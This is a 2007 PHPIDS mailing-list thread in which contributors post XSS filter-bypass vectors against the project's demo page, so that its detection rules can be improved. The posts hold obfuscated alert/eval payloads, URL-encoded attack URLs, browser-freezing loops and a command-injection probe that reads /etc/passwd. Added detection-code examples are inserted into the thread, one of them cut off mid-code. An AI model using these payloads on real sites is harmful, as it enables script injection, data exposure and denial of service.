Pleeeease hack us!


Mario Heiderich

Aug 28, 2007, 3:40:43 PM
to PHPIDS » Web Application Security 2.0
Hi!

After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spent lots of
time on the rules and except for some details we are pretty content
with them.

So if you like and find some time give them a new try - anyone who
will manage to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's interview will appear the next days - he was
again quicker than light with some vectors mentioned in the release
post).

Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+

Any vector which will be able to create an alert/content change via JS
on the demo page counts - as long as a PoC of whatever form can be
provided. A similar contest will follow in the next weeks for SQL
Injection.

Greetings and have fun!
.mario

Giorgio Maone

Sep 4, 2007, 11:02:01 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 4, 2007, 11:10:02 AM
to php...@googlegroups.com
Thanks Giorgio! Very classy ones again. *fixing*




--
_______________________
php-ids.org

Maie...@web.de

Sep 5, 2007, 3:16:18 PM
to PHPIDS » Web Application Security 2.0
Make Giorgio's threesome a foursome.
obj[name]() works as well, giving access to all top level functions/objects.
Low impact in general, but this might be combined with other things...

Mario Heiderich

Sep 5, 2007, 3:33:55 PM
to php...@googlegroups.com
Hi MalerMan and welcome to the group!
Nice variation - I shouldn't have forgotten that ;) *fixed*

Sorry for being late with answers today - I caught a cold and had to dig myself to a project although...

Greetings,
.mario

Gareth

Sep 6, 2007, 5:03:44 AM
to PHPIDS » Web Application Security 2.0
s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':
0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

Told you string concatenation was tough :)

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

Gareth

Sep 6, 2007, 6:55:43 AM
to PHPIDS » Web Application Security 2.0
This will also work with the window.name trick (on IE only onclick):-

URL=name

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

Gareth

Sep 6, 2007, 10:48:16 AM
to PHPIDS » Web Application Security 2.0
Now this is a strange one:-
h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':

0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;

It should work because I tested it locally, however it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
causing the onclick handler to produce invalid data. The code above gets
past your filters though.

Tested this in Firefox locally and it worked:-
<a
onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+'pt'+'';s4=''==''?':':


0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':

0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

Mario Heiderich

Sep 7, 2007, 11:54:39 AM
to php...@googlegroups.com
Yep - very nice and strange one indeed! But fixed. The concatenation algorithm has received a recode - hope that will stop the next wave ;)

Greetings and thanks!
.mario

2007/9/6, Gareth <gazh...@gmail.com>:




Gareth

Sep 7, 2007, 12:30:39 PM
to PHPIDS » Web Application Security 2.0
Cool Mario nice one, I'll look forward to hacking it again :)

I think I might have found 1 vector already

On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:



Gareth

Sep 8, 2007, 6:20:48 AM
to PHPIDS » Web Application Security 2.0
s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1

Mario Heiderich

Sep 8, 2007, 9:58:02 AM
to PHPIDS » Web Application Security 2.0
very cool and.. *fixed*

I sent you the questions, gareth. next would be kishor and giorgio if
you guys like to.

Gareth

Sep 8, 2007, 2:43:37 PM
to PHPIDS » Web Application Security 2.0
x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/
+'';j=s[1]+s[2]+s[3]+s[4]+s[5]+s[6]+s[7]+s[8]+s[9]+s[10]+c
+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j

On Sep 8, 2:58 pm, Mario Heiderich <Mario.Heider...@googlemail.com>

Gareth

Sep 9, 2007, 2:30:36 PM
to PHPIDS » Web Application Security 2.0
c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;
(URL=a);
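
The concatenation vectors Gareth posted in this thread (the ''+"jav"+'' chains, the 1==true&&'...' guards and this 1==1&& variant) all assemble one literal at runtime, which is why Mario's reply talks about a recode of the concatenation algorithm. The following is an added example and not PHPIDS code, nor code from anyone in this thread: a small Python resolver that folds the always-true guards, drops empty-string operands, substitutes already-resolved variables and then checks the joined literals against a plain sink rule. The samples are copied from the posts above; the guard regex, the sink rule and the function names are my own assumptions, and the resolver handles only these quoted-literal shapes, not the regex-literal and character-indexing vectors posted later in the thread.

```python
import re

# Constructed samples: the three concatenation vectors Gareth posted in this thread.
SAMPLES = {
    "quotes": ("s1=''+\"jav\"+'';s2=''+\"ascri\"+'';s3=''+\"pt\"+'';s4=''==''?':':"
               "0;s5=''+\"aler\"+'';s6=''+\"t\"+'';s7=''==''?'(1)':"
               "0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8"),
    "and_guard": "s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2;URL=s1",
    "and_guard2": "c4=1==1&&'(1)';c3=1==1&&'aler';c2=1==1&&':';c1=1==1&&'javascript';a=c1+c2+c3+'t'+c4;(URL=a);",
}

# Assumed shapes of an always-true guard wrapping a string literal:
#   ''==''?'X':0      1==1&&'X'      1==true&&'X'
GUARD = re.compile(
    r"(?:''==''|1==1|1==true)\s*(?:\?\s*('[^']*'|\"[^\"]*\")\s*:\s*0|&&\s*('[^']*'|\"[^\"]*\"))"
)
LITERAL = re.compile(r"^(['\"])(.*)\1$", re.S)
# Constructed sink rule; the real PHPIDS rules live in default_filter.xml and differ.
SINK = re.compile(r"javascript:|alert\s*\(", re.I)


def resolve_literals(js: str) -> dict:
    """Statically fold `name = <literal|var>(+ <literal|var>)*` statements.

    Returns a map from variable name to the string the browser would end up
    holding.  Anything that is not a plain concatenation of string literals and
    already-resolved variables is skipped, so the result is conservative.
    """
    env = {}
    # Step 1: replace each tautology guard by the literal it protects.
    folded = GUARD.sub(lambda m: m.group(1) or m.group(2), js)
    # Step 2: walk the statements and fold concatenations of literals/known vars.
    for stmt in folded.split(";"):
        stmt = stmt.strip().strip("()")        # "(URL=a)" is just "URL=a"
        if "=" not in stmt:
            continue
        lhs, rhs = (part.strip() for part in stmt.split("=", 1))
        value = ""
        for operand in (p.strip() for p in rhs.split("+")):
            lit = LITERAL.match(operand)
            if lit:
                value += lit.group(2)          # '' contributes nothing, 'jav' adds "jav"
            elif operand in env:
                value += env[operand]
            elif operand:
                value = None                   # unknown name: give up on this statement
                break
        if value is not None:
            env[lhs] = value
    return env


def suspicious_values(js: str) -> list:
    """Resolved strings that the plain sink rule flags once the pieces are joined."""
    return sorted({v for v in resolve_literals(js).values() if SINK.search(v)})


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(name, "->", suspicious_values(sample))
```

The point of the pre-pass is that the sink rule itself stays simple and precise; it is the converter that undoes the splitting, so a new splitting trick means one more rewrite rule rather than one more regex that has to anticipate every fragment boundary.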

thornmaker

Sep 9, 2007, 4:06:14 PM
to PHPIDS » Web Application Security 2.0

thornmaker

Sep 10, 2007, 1:19:22 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 10, 2007, 4:16:17 AM
to php...@googlegroups.com
Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for being in the right format to  be executed.

2007/9/10, thornmaker <thorn...@gmail.com >:

Gareth

Sep 10, 2007, 4:40:26 AM
to PHPIDS » Web Application Security 2.0
Hi All

I've written a simple script to conduct concatenation attacks, so if
anyone wants to improve it or add new vectors please do and send them
to the group.
The reason I think it is needed is because of the amount of possible
combinations, and having an automated tool like this would help with
unit testing of the code. You never know when a vector could creep
back in, you see.

Tool available here:-
www.businessinfo.co.uk/labs/phpids/phpids.php.zip

On Sep 10, 9:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Wow - that's a nice one. I love the trick regex 1 preparing regex 2 for
> being in the right format to be executed.
>

> 2007/9/10, thornmaker <thornma...@gmail.com>:


>
>
>
> > here's another one using the "exec" function for regular expressions
> > to extract the strings to execute:
>

> >http://demo.php-ids.org/?test=%64%3D%27%27%2B%2F%65%76%61%6C%7E%6C%6F...


Gareth

Sep 10, 2007, 7:15:51 AM
to PHPIDS » Web Application Security 2.0
Another thing I've thought about is Javascript based XSS protection, I
don't know if this is outside the project's goal but something like
this would prevent window.name exploits:-

<script type="text/javascript">window.name=''</script>

Which the PHPIDS could include in the header of the page.

Mario Heiderich

Sep 10, 2007, 7:24:54 AM
to php...@googlegroups.com
It's a good idea but it's way outside the project - the IDS will provide no protection - just monitoring and information on possible attacks. I had the PHPIPS idea in my head too for some time but there are so many other tools and ways to solve that...

2007/9/10, Gareth <gazh...@gmail.com>:

thornmaker

Sep 10, 2007, 9:45:43 AM
to PHPIDS » Web Application Security 2.0
so here's a similar one but eliminates the reg exp's... just pulls the
chars from the ''+/asdf/ directly.
http://demo.php-ids.org/?test=%78%3D%27%27%2B%2F%61%62%63%64%65%66%67%68%69%6A%6B%6C%6D%6E%6F%70%71%72%73%74%75%76%77%78%79%7A%2E%28%31%29%2F%3B%65%3D%78%5B%35%5D%3B%76%3D%78%5B%32%32%5D%3B%61%3D%78%5B%31%5D%3B%6C%3D%78%5B%31%32%5D%3B%6F%3D%78%5B%31%35%5D%3B%63%3D%78%5B%33%5D%3B%74%3D%78%5B%32%30%5D%3B%69%3D%78%5B%39%5D%3B%6E%3D%78%5B%31%34%5D%3B%68%3D%78%5B%38%5D%3B%73%3D%78%5B%31%39%5D%3B%75%3D%78%5B%32%31%5D%3B%62%3D%78%5B%32%5D%3B%72%3D%78%5B%31%38%5D%3B%67%3D%78%5B%37%5D%3B%64%6F%74%3D%78%5B%32%37%5D%3B%75%6E%6F%3D%78%5B%32%39%5D%3B%6F%70%3D%78%5B%32%38%5D%3B%63%70%3D%78%5B%33%30%5D%3B%7A%3D%65%2B%76%2B%61%2B%6C%3B%79%3D%6C%2B%6F%2B%63%2B%61%2B%74%2B%69%2B%6F%2B%6E%2B%64%6F%74%2B%68%2B%61%2B%73%2B%68%2B%64%6F%74%2B%73%2B%75%2B%62%2B%73%2B%74%2B%72%2B%69%2B%6E%2B%67%2B%6F%70%2B%75%6E%6F%2B%63%70%3B%30%5B%27%27%2B%5B%7A%5D%5D%28%30%5B%27%27%2B%28%7A%29%5D%28%79%29%29%3B#alert%280%29

Mario: do you prefer these posted here or at sla.ckers or both?


On Sep 10, 4:16 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:



Mario Heiderich

Sep 10, 2007, 10:03:32 AM
to php...@googlegroups.com
Wow - I am impressed again ;) I'd prefer both variants of publishing if you don't mind. Great work, thornmaker!

Greetings,
.mario

2007/9/10, thornmaker < thorn...@gmail.com>:




xorrer

Sep 10, 2007, 5:49:47 PM
to PHPIDS » Web Application Security 2.0
A few of my findings.

A redirect to google.

http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%3A%6C%65%2E%63%6D%2F%3B%68%3D%78%5B%30%2B%31%5D%3B%74%3D%78%5B%32%2B%31%5D%3B%70%3D%78%5B%34%2B%31%5D%3B%64%3D%78%5B%37%2B%31%5D%3B%73%3D%78%5B%31%2D%31%5D%3B%77%3D%78%5B%31%2B%31%5D%3B%70%31%3D%78%5B%33%2B%31%5D%3B%67%3D%78%5B%35%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6C%3D%78%5B%38%2B%31%5D%3B%65%3D%78%5B%39%2B%31%5D%3B%63%3D%78%5B%31%31%2B%31%5D%3B%6F%3D%78%5B%36%2B%31%5D%3B%6D%3D%78%5B%31%32%2B%31%5D%3B%75%3D%68%2B%74%2B%74%2B%70%2B%64%2B%73%2B%73%2B%77%2B%77%2B%77%2B%70%31%2B%67%2B%6F%2B%6F%2B%67%2B%6C%2B%65%2B%70%31%2B%63%2B%6F%2B%6D%2B%73%3B%6E%61%76%69%67%61%74%65%28%75%29%3B

If you enter this http://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B
the site opens and immediately closes (close()).

The following two lock up the browser with 100% CPU activity.

http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%62%65%72%2E%4D%41%58%5F%56%41%4C%55%45%3B%2B%2B%69%29%7B%31%7D
http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

This is an Opera-specific thing which you could use to spam up the
"error console" using an endless loop. opera.postError(1);

On 10 Sep., 16:03, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:



Mario Heiderich

Sep 10, 2007, 6:10:52 PM
to PHPIDS » Web Application Security 2.0
Hi xorrer and welcome!

Nice stuff - I didn't know about the opera specific JS - is there a
link to inform about that stuff?

Needless to say that the rules are *fixed* ;)

Thanks man!
.mario

On Sep 10, 11:49 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> A few of my findings.
>
> A redirect to google.
>

> http://demo.php-ids.org?test=%78%3D%27%27%2B%2F%68%77%74%2E%70%67%6F%...
>
> If you enter thishttp://demo.php-ids.org?test=%63%6C%6F%73%65%28%29%3B


> the site opens and immediatly closes (close()).
>
> The following two lock up the browser with 100% CPU activity.
>

> http://demo.php-ids.org?test=%66%6F%72%28%69%3D%31%3B%69%3C%4E%75%6D%...http://demo.php-ids.org?test=%77%68%69%6C%65%28%31%29%7B%31%7D

thornmaker

Sep 10, 2007, 10:23:24 PM
to PHPIDS » Web Application Security 2.0

Andrei Savu

Sep 11, 2007, 5:03:09 AM
to php...@googlegroups.com
All this is simply unbelievable. I am starting to think that this is an endless battle.

As I can see PHP IDS will help to make your website more secure but your
security problems will not end here, you will still need very good input filtering and
output escaping. Personally I don't think this kind of blacklist filtering is the answer
to this security problem.

I think that PHP IDS will give only a fake feeling of security. I am sure that it
will always be possible to find a new attack vector that is not already detected.

I will use PHP IDS because I am sure my scripts are not perfect and somewhere
there is a path that is not protected enough and someday someone will find it. By
using PHP IDS I hope I will limit most of attacks but I still consider that good input
filtering and output escaping is the only real solution.

I am amazed at how many ways there are of injecting javascript into a page.

--
'Discipline is the bridge between goals and accomplishments.' -Jim Rohn
"Set your goals high, and don't stop till you get there." Bo Jackson

Gareth

Sep 11, 2007, 6:08:06 AM
to PHPIDS » Web Application Security 2.0
Check this one:-
_=alert,1,1,_(1);

Muhahahahahaha

On Sep 10, 11:10 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:



Mario Heiderich

Sep 11, 2007, 6:21:44 AM
to php...@googlegroups.com
Hi Andrej!


"I think that PHP IDS will give only a fake feeling of security. I am sure that it
will always be possible to find a new attack vector that is not already detected."

The PHPIDS shouldn't give you any feeling of security at all - it's no filter and no sanitizing mechanism. As said on the start page it's able to tell you when someone is trying to attack your site and how and where he's doing it. So it's a candy layer which definitely doesn't substitute responsible development. Most people using the PHPIDS use it on high traffic sites to be able to get some figures to ease risk assessment. The feedback we get from the sites using the PHPIDS is great and with every release we can cover more attacks and fewer false positives.

And yes - there will be no end regarding possible vectors and that's what makes the work with the PHPIDS so exciting. I think, and can speak for myself and others too, that working on the PHPIDS is about learning what is possible, understanding XSS, SQL Injection etc. in great detail and widening one's scope of what is possible today when talking about webapp security. It's definitely a 2.0 thing too (man I hate that term *g*) because we gather knowledge from people all over the world in this place and everybody who has information or time to contribute is more than welcome ;)

I hope my little prayer didn't sound too pathetic but I just wanted to make sure what the PHPIDS is and what it's not. And yes - we will continue working on the patterns even if we all know that there will be no resulting software which is 100% bullet proof.


Greetings,
.mario


2007/9/11, Andrei Savu <savu....@gmail.com >:




xorrer

Sep 11, 2007, 6:30:40 AM
to PHPIDS » Web Application Security 2.0
On 11 Sep., 00:10, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

> Nice stuff - I didn't know about the opera specific JS - is there a
> link to inform about that stuff?

Well the only real source I know of is here
http://www.howtocreate.co.uk/operaStuff/operaObject.html.
And a file once included with earlier opera versions jsconsole.html
(http://people.opera.com/byberg/jsconsole.html,
http://www.scss.com.au/family/andrew/opera/panels/jsconsole/jsconsole.html)

xorrer


Mario Heiderich

Sep 11, 2007, 7:33:22 AM
to php...@googlegroups.com
Thanks xorrer!

@Gareth: This one is evil. damn!

2007/9/11, xorrer <obhvsb...@gmail.com>:




Gareth

Sep 11, 2007, 7:45:58 AM
to PHPIDS » Web Application Security 2.0
:)

Dr Evil strikes again muwhahaahaha

I tried to create the smallest possible vector to see if it was
possible, this is dangerous because you can call functions or assign
functions using this technique. Combine it with string concatenation
and there's pretty much anything you can do.

On Sep 11, 12:33 pm, "Mario Heiderich"


<mario.heider...@googlemail.com> wrote:

Mario Heiderich

Sep 11, 2007, 7:59:05 AM
to php...@googlegroups.com
That's indeed DrEvilish - damn - this is working in dozens of combinations...

_=alert, 'a',1;_(1);

_=alert,
1,1;_(1);

_=alert, 1,
1
_(1);

_=alert, 'a',1   ,   _  (1);

Man - it's going to be really hard to find a pattern.

2007/9/11, Gareth <gazh...@gmail.com>:




Gareth

Sep 11, 2007, 8:13:26 AM
to PHPIDS » Web Application Security 2.0
Sorry mate :)

It's unbelievable that javascript allows variables to be called just
'_' don't you think lol

I always say building things is a lot harder than breaking them ;)

On Sep 11, 12:59 pm, "Mario Heiderich"


<mario.heider...@googlemail.com> wrote:

thornmaker

Sep 11, 2007, 9:53:39 PM
to PHPIDS » Web Application Security 2.0
I like how the error page shows the vector in an input box now... but
could you make it a bit wider?

Also... I would like to test some of the path traversal injections but
am not sure what would be considered 'passing'. For example...
http://demo.php-ids.org/?test=1;cat%20/e*c/p*d will display /etc/
passwd in the right context, and you have filters that search for etc
and /etc/passwd outright, so I presume PHPIDS _should_ catch such
things...

thornmaker

Sep 12, 2007, 3:43:11 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 12, 2007, 4:47:20 PM
to PHPIDS » Web Application Security 2.0
@thornmaker: both of your last ones are fixed now. thanks man!

On Sep 12, 9:43 am, thornmaker <thornma...@gmail.com> wrote:
> http://demo.php-ids.org/?test=%28%7A%3D%53%74%72%69%6E%67%29%26%26%28...



thornmaker

Sep 14, 2007, 12:14:03 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 14, 2007, 4:39:21 AM
to php...@googlegroups.com
This is plain awesome - already commented on that one on slackers. Thanks, thornmaker!!!

2007/9/14, thornmaker <thorn...@gmail.com>:




thornmaker

Sep 14, 2007, 9:57:10 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 14, 2007, 11:15:31 AM
to php...@googlegroups.com
Yep - I should have put more thought into the rule fixes. Thanks again!

2007/9/14, thornmaker <thorn...@gmail.com>:




thornmaker

Sep 14, 2007, 7:45:15 PM
to PHPIDS » Web Application Security 2.0
I was looking at Kishord's new vector and when I submitted (a slight
variation of it) I got this funny error. I can't reproduce it now,
but thought I would mention it. See http://p42.us/php-ids/php-ids-error.png
for a screen shot.

Mario Heiderich

Sep 14, 2007, 8:05:20 PM
to php...@googlegroups.com
Hehe - you managed to catch a 15 second window when i uploaded a faulty file ;)

2007/9/15, thornmaker <thorn...@gmail.com>:




thornmaker

Sep 14, 2007, 10:16:48 PM
to PHPIDS » Web Application Security 2.0
Shortly after that, I realized you were working on it live. First it
was blocked by one filter... a few minutes later it was blocked by
two :)

On Sep 14, 8:05 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:



thornmaker

Sep 15, 2007, 12:00:51 AM
to PHPIDS » Web Application Security 2.0

xorrer

Sep 15, 2007, 4:19:51 AM
to PHPIDS » Web Application Security 2.0

xorrer

Sep 15, 2007, 6:05:23 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 6:15:00 AM
to php...@googlegroups.com
Nice one, xorrer! Your first ones I fixed by accident while working on thornmaker's and kishor's examples but the second one came unexpected ;) I did a slight modification on the converter to fix it. Thx!

2007/9/15, xorrer <obhvsb...@gmail.com>:




xorrer

Sep 15, 2007, 7:56:50 AM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 9:34:08 AM
to php...@googlegroups.com
Well - I think i got it this time ;)

@xorrer: I'd like to add you to the credits page - you want to be mentioned as xorrer or with your full name? You have a website you want to link your name to?

2007/9/15, xorrer <obhvsb...@gmail.com>:




xorrer

Sep 15, 2007, 11:42:28 AM
to PHPIDS » Web Application Security 2.0
@mario

Thanks. You can just list me up as xorrer, no webpage to link to.

On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


> Well - I think i got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...

xorrer

Sep 15, 2007, 12:01:10 PM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 12:10:36 PM
to php...@googlegroups.com
Argh - one second after the release ;)

2007/9/15, xorrer <obhvsb...@gmail.com>:




xorrer

Sep 15, 2007, 12:36:28 PM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 15, 2007, 12:53:10 PM
to php...@googlegroups.com
Well - this issue seems to be way harder to solve than i originally thought.

2007/9/15, xorrer <obhvsb...@gmail.com>:

thornmaker

Sep 15, 2007, 3:00:39 PM
to PHPIDS » Web Application Security 2.0

xorrer

Sep 15, 2007, 5:31:04 PM
to PHPIDS » Web Application Security 2.0
Good stuff thornmaker.

Those ternary ones are tough to prevent

I have a vector which fails by just one character. But I would like to
share it anyway.

http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B%61%2B%27%65%76%61%27%2C%5D%3B%63%3D%5B%62%2B%27%6C%27%2C%5D%3B%64%3D%5B%61%2B%27%61%6C%65%72%27%2C%5D%3B%65%3D%5B%64%2B%27%74%28%27%2C%5D%3B%0D%0A%66%3D%5B%65%2B%27%63%25%32%39%27%2C%5D%3B%0D%0A%24%3D%2E%31%5B%63%5D%3B%0D%0A%61%3D%24%3B%0D%0A%61%28%66%29

If you remove the closing bracket it passes the IDS, but then the
eval won't work.

And with my setup there is no way to escape this regex _START_,.+=.+
(\?|,).*\)_END_ or am I wrong?

On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!

> here's another ternary one to add to the mix:http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...

xorrer

Sep 15, 2007, 8:44:07 PM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 16, 2007, 10:18:56 AM
to PHPIDS » Web Application Security 2.0
Nice! The third one from xorrer pointed out a stupid but dangerous bug
in the rules - which is now fixed.

On Sep 16, 2:44 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> here are two other vectors.
>

> http://demo.php-ids.org/?test=%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%27...
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62...


Mario Heiderich

Sep 16, 2007, 1:35:03 PM
to php...@googlegroups.com
Hmmm - results in an impact of 2. I consider this as appropriate.

2007/9/16, xorrer <obhvsb...@gmail.com>:

<code>asd</code>

On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>

xorrer

Sep 16, 2007, 1:36:36 PM
to PHPIDS » Web Application Security 2.0
Here is another one.

Copy/Paste the vector from here http://phpfi.com/263258

On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

xorrer

Sep 16, 2007, 1:39:11 PM
to PHPIDS » Web Application Security 2.0
On Sep 16, 7:35 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Hmmm - results in an impact of 2. I consider this as appropriate.
>
> 2007/9/16, xorrer <obhvsbypqg...@gmail.com>:
> <code>asd</code>

That wasn't actually a vector, only a test if the <code> tag can be
used in postings. Man, this post was only up 2 seconds, how did you manage
to catch it?


xorrer

Sep 16, 2007, 1:42:05 PM
to PHPIDS » Web Application Security 2.0

Mario Heiderich

Sep 16, 2007, 1:43:12 PM
to php...@googlegroups.com
Actually I'm a bot. *kidding*
No - just a coincidence :)

2007/9/16, xorrer <obhvsb...@gmail.com>:




Martin Hinks

Sep 16, 2007, 1:51:44 PM
to php...@googlegroups.com
Mario > *

Those vectors are really great xorrer - many many thanks!

Martin

Mario Heiderich

Sep 16, 2007, 1:54:33 PM
to php...@googlegroups.com
Yep - they are and they are furthermore really helpful to point out bugs in the rules. The last examples used the fact that you can use $ as label in JS (we had that earlier) which I plain forgot in several rules.

Awesome stuff!

2007/9/16, Martin Hinks <mhi...@gmail.com>:




Martin Hinks

Sep 16, 2007, 2:00:00 PM
to php...@googlegroups.com
Hey Mario, something I just noticed:

a = eval;a(test);

scores nothing and performs an eval on test...

a=eval;a(test);

(without the spaces) scores an impact of 5.

Might want to fix the rule so that spaces are included and raise the
same impact...

M

Mario Heiderich

Sep 16, 2007, 2:13:03 PM
to php...@googlegroups.com
@Martin: Thanks - but I know. If I'd fix that we'd generate tons of false alerts. I've been struggling with the JS property rules for some time (the ones starting with (?:[^$\w\/-\s](?: ).

Maybe they will be removed soon but there's lots of testing needed before...

2007/9/16, Martin Hinks <mhi...@gmail.com>:




Martin Hinks

Sep 16, 2007, 2:31:03 PM
to php...@googlegroups.com
Ok... well, something to think about!

Btw:

function x () { alert(1) }; x();

Can't believe that isn't detected!

Have fun!

Martin Hinks

Sep 16, 2007, 2:34:38 PM
to php...@googlegroups.com
Damn - must have caught you between rule changes - knew it was too easy :p

M

Mario Heiderich

Sep 16, 2007, 2:39:50 PM
to php...@googlegroups.com
Yep - rules were temporarily not at full strength, sry.

in Hinks <mhi...@gmail.com>:

xorrer

Sep 16, 2007, 3:32:55 PM
to PHPIDS » Web Application Security 2.0
Same stuff.

http://demo.php-ids.org/?test=%C3%A4%3D%2F%C3%A4%2F%3F%27%27%3A+0%3Bb%3D%28%C3%A4%2B%27eva%27%2B%C3%A4%29%3Bb%3D%28b%2B%27l%27%2B%C3%A4%29%3Bd%3D%28%C3%A4%2B%27XSS%27%2B%C3%A4%29%3Bc%3D%28%C3%A4%2B%27aler%27%2B%C3%A4%29%3Bc%3D%28c%2B%27t%28d%29%27%2B%C3%A4%29%3B%C3%A4%3D.0%5Bb%5D%3B%C3%A4%28c%29

On Sep 16, 8:39 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:



Martin Hinks

Sep 16, 2007, 3:56:11 PM9/16/07
to php...@googlegroups.com
Ok, got one for real now :p

b = (x());
$ = .0[b];a=$;
a( h() );
function x () { return 'eva' + p(); };
function p() { return 'l' ; };
function h() { return 'aler' + i(); };
function i() { return 't (123456)' ; };

Enjoy ;)

M

Mario Heiderich

Sep 16, 2007, 4:12:07 PM9/16/07
to php...@googlegroups.com
It's absolutely impressive that JavaScript accepts Unicode as labels - you can even do stuff like:

ł = alert;
ł(1)

That, combined with the fact that \w doesn't match those chars and \p isn't really an option for compatibility's sake, makes more rules discussable than I thought before. Damn JavaScript ;)





--
_______________________
php-ids.org
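The identifier-charset problem Mario describes above is easy to reproduce and worth seeing side by side with the alternative. The block below is an added example and not PHPIDS code: it writes the same "some name is assigned alert or eval" rule three ways (an ASCII \w identifier class, a Unicode-aware \p{L} class, and a version anchored on the sink name that never models identifiers at all) and runs each over constructed samples, including one mirroring the `ł = alert;` snippet. The rule names and samples are this example's own.

```javascript
// Added example, not PHPIDS code: three ways of writing "an identifier is
// assigned a dangerous function", tried on ASCII and Unicode identifiers.

// 1. ASCII-only identifier class. In JavaScript (as in PCRE without the u
//    modifier) \w is [A-Za-z0-9_], so "ł" or "ä" is invisible to this rule.
const ASCII_ALIAS = /\w+\s*=\s*(?:alert|eval)\b/;

// 2. Unicode-aware identifier class via property escapes (requires the u flag).
//    Deliberately loose: any letter, then letters, digits, _ or $.
const UNICODE_ALIAS = /[\p{L}_$][\p{L}\p{N}_$]*\s*=\s*(?:alert|eval)\b/u;

// 3. Sink-anchored: ignore the left-hand side entirely and key on the
//    function being aliased. Needs no identifier model at all; the trailing
//    \b keeps "= alertShown" from matching.
const SINK_ANCHORED = /=\s*(?:alert|eval)\b/;

// Report which of the three rules fire on a JavaScript fragment.
function whichRulesFire(js) {
  return {
    ascii: ASCII_ALIAS.test(js),
    unicode: UNICODE_ALIAS.test(js),
    sink: SINK_ANCHORED.test(js),
  };
}

// Constructed samples. The second mirrors the "ł = alert; ł(1)" snippet
// from the post above; the third is benign and must not fire.
const CASES = {
  asciiIdentifier: 'x = alert;\nx(1)',
  unicodeIdentifier: 'ł = alert;\nł(1)',
  benign: 'handler = alertShown ? 1 : 0;',
};

for (const [name, js] of Object.entries(CASES)) {
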